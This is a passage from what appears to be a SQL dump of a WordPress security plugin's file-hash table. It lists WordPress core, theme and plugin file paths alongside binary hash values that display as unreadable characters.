q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�S�y�+��[��H','wp-content/themes/magazine-hoot/hybrid/ext/get-the-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�X�٧冃=�b','����ΝŴ%x�id���\Z�5�a=V��B>$','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�HK��^��^��','wp-content/themes/magazine-hoot/images/select.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\'2xL5JՀ��?��','����s/ZNd�bJ��;eF@��j�7G�hF\r�','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᪟L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d','	N��ż	�I6h�%^�?`v�Y�=��2��','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"1��6�����','z���;���LRK�`�jݰ�P\'�N�v\'','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�뺆��	�#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z	�s�E����P|��','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('���	�kB[�y4��!','wp-content/themes/magazine-hoot/hybrid/inc/functions-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��*𸆉=S�#e�','�]�s�k�Dh땬�5h�]R4�[\r9@n�P�<�','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��|��\'\rȤ�@�\n','B��x.e��DP�0�����$\Z�D3��','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z%�[�l�]ʕ����','���I�^�K��_�i��Gz��:5��n|�ߡL','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�k���o!g�c_	f�L','wp-content/themes/magazine-hoot/hybrid/inc/functions-layouts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �0�nL�6Z��<��','`%b��[J���;���	[�<J�[��O6|��','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��{�x�y6roc�','ɬ�v��O�܋)%���\0���|М���O�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�9(�����&!�x�','5�r�Q���b�͔5�t����>:js-O','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�ڨ�t�c	�˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y.��|�	�zo~��','�m`C/\r���~�����/#b\ZM͆��]�؍i','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��T:8Eu�\"W��1��','wp-content/themes/magazine-hoot/hybrid/extend/customize/style-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E+��o��H6Z�Z�1%','��F��(\'\Z�c��|���X�0���r','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�����G1��','[�d�뿪�a��o�Ϸ�8|[��U׎��u�(','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�b�Rʳ�/��̌ޟ��','wp-content/themes/magazine-hoot/include/admin/widget-post-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�Ǎպ\"m�zQ�','��-���-�>��]�8�b�z�8@�����','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�)=�\'d�G�','d6��H�W�F�8!�y�NA���2��\'`@�','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�UŽ�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e�	�','',0,'?'),('�€����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C›�','',0,'?'),('�+9��_��P�H-','wp-content/themes/magazine-hoot/hybrid/inc/class-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d����|�����s�','g�!�S%jT�?f�2��r\\;��R�q��fѡ9@�','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\07Α�L��b�HgO�','5���m���%!��au�l�qRk{qn�ia�0','',0,'?'),('�r�±�2�\"}�	�,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���7[�x�蛴','8�I��ԉo�)\'z�R�^�-M1\'�\0����','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'�ZP��ie����','6m�<g��\0{tX��)��U�4�N�4M�3','',0,'?'),('��eş+�\r��	���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��r�݇o��','�Yb�eA\'�#�đÎؚ��[9��=-&S�TT�','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�g|6��“�o(	��4','wp-content/themes/magazine-hoot/hybrid/inc/class-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$l=�dY?U��ȃ�&�','�filzk� �7��Q�>�IDV۴�h����zXw','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��--��	�2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('��ܦ�4}��5�','wp-content/themes/magazine-hoot/hybrid/license.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�O���z�#W�=��','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�pz$]��?﫶gj�','��������<��^�M�v��5�Ò����j','',0,'?'),('�Z���le=՟��WKЇ','wp-content/themes/magazine-hoot/template-parts/comments-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�q����r��k1#','���8C=�p�p�+�6tß�_�3d���','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�b��VE��7f��	','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?:Ĉ�-�żѐ\\x)p','�2�-�X����)��\rP�����bV�ҝb)sV','',0,'?'),('�v��\r�����F�k�','wp-content/themes/magazine-hoot/include/admin/images/slider-type-html.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��V��M`�C�','b�[�m�~o����R\Zo\r�����);�r�','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�И�]e��Ğ�c%�I�','�\\H�XE�[����h�������YT��Uƥ','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�9:��\"b���\0�U','wp-content/themes/magazine-hoot/include/admin/widget-content-posts-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�e�1��R�����W','�w��=�=�ΰ�+R�^��[z���RR�2��Z�b','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R	